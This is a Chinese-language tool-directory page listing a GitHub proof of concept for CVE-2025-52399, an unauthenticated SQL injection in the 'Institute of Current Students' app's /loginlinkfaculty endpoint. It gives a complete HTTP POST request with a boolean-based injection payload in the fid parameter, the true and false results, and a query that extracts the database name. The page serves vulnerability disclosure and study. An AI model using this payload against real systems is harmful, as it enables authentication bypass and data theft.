Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students | Kitploit
工具/GitHubGitHub/gmh5225/cve-2025-52399-sqli-institute-of-current-students
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubgmh5225/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
1年前尚未审核

CVE-2025-52399 - Institute of Current Students 中的 SQL 注入漏洞

概述

Institute-of-Current-Students 应用程序中的 loginlinkfaculty 端点通过 fid POST 参数存在 SQL 注入漏洞。该参数在用于 SQL 查询之前未经过适当的清理,从而允许远程攻击者执行任意 SQL 命令。

  • 漏洞类型:SQL 注入
  • 受影响组件:/loginlinkfaculty (POST)
  • 受影响参数:fid
  • 身份验证:不需要
  • 影响:身份验证绕过、数据提取
  • 测试环境:Localhost
  • 数据库:icsnew
  • 版本:1.0

PoC

HTTP 请求

http POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+321=6+AND+000942=000942--&pass=example

Payload 结果

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE ❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE

数据库提取

SELECT database(); -- returns 'icsnew'

参考资料

  • CVE-2025-52399 (MITRE)
  • 受影响应用程序
  • OWASP SQL 注入

发现者

Isroil Mustafoqulov

下载工具